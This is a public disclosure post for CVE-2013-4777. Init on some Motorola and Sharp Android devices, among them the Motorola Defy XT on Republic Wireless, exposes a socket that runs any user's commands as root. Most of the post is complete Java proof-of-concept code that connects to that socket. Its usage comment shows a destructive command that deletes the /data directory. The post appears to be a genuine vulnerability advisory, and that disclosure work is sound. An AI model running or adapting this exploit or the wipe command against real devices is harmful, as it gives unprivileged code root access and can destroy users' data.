Debug/test feature in init allows any user to execute shell commands as the root user on some Motorola and Sharp devices.

Lets see if we can bump my embarrassing presentation further down the page...

This vulnerability is being published now as the responsible parties have informed me that it will not be fixed due to no planned updates for the device. Very few devices are affected, seems to be limited to one small carrier (Republic Wireless) in the US.

 At boot time init creates a socket at /dev/socket/init_runit, and accepts shell commands. When a command is sent, init executes the command as the root user.

CVE: CVE-2013-4777

Affected Devices:
    Motorola Defy XT - Republic Wireless
    Probably others

The responsible parties for this have informed me that this issue will not be fixed due to the age of the affected device. Initial disclosure was July 9th 2013.



package com.cunninglogic.arsenic;

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

import android.net.LocalSocket;
import android.net.LocalSocketAddress;
import android.util.Log;

public class SocketComm {
    static String TAG = "Arsenic";
    static byte[] buf = new byte[0x400];
    int buflen = 0;
    static InputStream mIn;
    static OutputStream mOut;
    static LocalSocket mSocket;
    
    /* Arsenic for Motorola Defy XT (Republic Wireless) and others
     * By: jcase@cunninglogic.com
     * Usage:
     * SocketComm.execCommand("/system/bin/rm -r /data");
     * 
     */
    
    public static boolean execCommand (String command) {
    boolean success = false;
    if (connect()){
    byte[] bytesCommand = command.getBytes();
    int i = bytesCommand.length;
    if(i >= 1 && i <= 1024) {
    buf[0] = (byte)(i & 255);
    buf[1] = (byte)(i >> 8 & 255);
   
    try {
mOut.write(buf, 0, 2);
mOut.write(bytesCommand, 0, i);
} catch (IOException e) {
Log.e(TAG, "command error");
disconnect();
success = false;
}
    }
    }

    return success;
    }
    
    private static boolean connect() {
boolean isConnected = true;
   
if (mSocket == null) {
mSocket = new LocalSocket();
LocalSocketAddress mAddress = new LocalSocketAddress("init_runit",LocalSocketAddress.Namespace.RESERVED);
try {
mSocket.connect(mAddress);
mIn = mSocket.getInputStream();
mOut = mSocket.getOutputStream();
isConnected = true;
} catch (IOException e) {
isConnected = false;
e.printStackTrace();
}
}
return isConnected;
    }
    
   @SuppressWarnings("null")
private static void disconnect() {
    LocalSocket socket = null;
    try {
   
    if(mSocket != null){
    mSocket.close();
    }
   
    if(mIn != null){
    mIn.close();
    }
   
    if(mOut != null){
    mOut.close();
    }    
   
    mSocket = socket;
    mIn = socket.getInputStream();
    mOut = socket.getOutputStream();
   
} catch (IOException e) {
e.printStackTrace();
}
   
    }
    
}
Shared publiclyView activity